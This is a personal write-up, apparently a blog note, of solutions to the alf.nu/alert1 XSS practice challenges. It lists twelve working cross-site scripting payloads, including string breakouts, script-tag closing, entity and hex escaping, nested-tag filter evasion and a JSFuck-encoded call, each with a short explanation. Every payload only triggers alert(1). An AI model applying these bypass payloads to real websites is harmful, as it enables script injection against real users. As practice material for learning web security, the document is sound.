XSS challenge practice


Online practice site: https://alf.nu/alert1
Tutorials:

https://blog.csdn.net/he_and/article/details/79672900
http://www.bubuko.com/infodetail-1591286.html
https://blog.csdn.net/taozijun/article/details/8100435

Only part of it is done; I'll look at the rest later.
I.
1. warmup
");alert(1)//
"); closes what comes before, // comments out what follows, and <!-- can also be used as a comment.
2. adobe
\");alert(1)//
The site puts a \ in front of double quotes to escape them, so we can put our own \ in first.
3. json
</script><script>alert(1)//
</script> closes the open script block first, <script> opens a new one for what follows, and // comments out the trailing ");
4. javascript
%22);alert(1)//
javascript:console.log("%22);alert(1)//")
When we use " it gets escaped with \, so we URL-encode it as %22.
5. markdown
[[a|http://onerror='alert(1)']]
<img alt="<a href="http://onerror='alert(1)'" src="a.gif">">http://onerror='alert(1)']]</a>
[[a|b]]    when src cannot be loaded, the alt part is executed
<img alt="b" src="a.gif">
Quoted: a slash / in front of onerror() does not stop onerror from executing, and as long as attribute names are not adjacent, stray single and double quotes between attributes do not stop the attributes from taking effect either.
6. dom
var m = s.split(/#/);  splits on #; leave the first two parts empty
Element
TextNode
comment creates a comment node
Comment#><script>alert(1)</script>
<!--><script>alert(1)</script>-->  the trailing --> has no effect
7. callback
'#';alert(1)//
# is the separator, the quotes wrap it so it counts as one string, ; ends the previous input field, and // comments out the rest.
8. skandia
</script><img src=1 onerror=&#97&#108&#101&#114&#116(1)
HTML tags are case-insensitive while JS is case-sensitive; here alert is written with HTML character entities.
9. template
\x3c/a\x3e \x3cimg src=1 onerror=alert(1) \x3e \\
< and > are filtered but \ is not; \x3c and \x3e are rendered back into HTML.
{ '<': '&lt;', '>': '&gt;', '&': '&amp;', '"': '&quot;', "'": '&#39;' }
10. json2
</s</scriptcript><script>alert(1)//
Nested doubling: the inner </script> is stripped once, and what is left forms the outer one.
11. callback2
'#';alert(1);<!--
// is filtered, so <!-- is used instead.
12. skandia2
");[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()//
alert is encoded with http://www.jsfuck.com/
 
2018.7.26
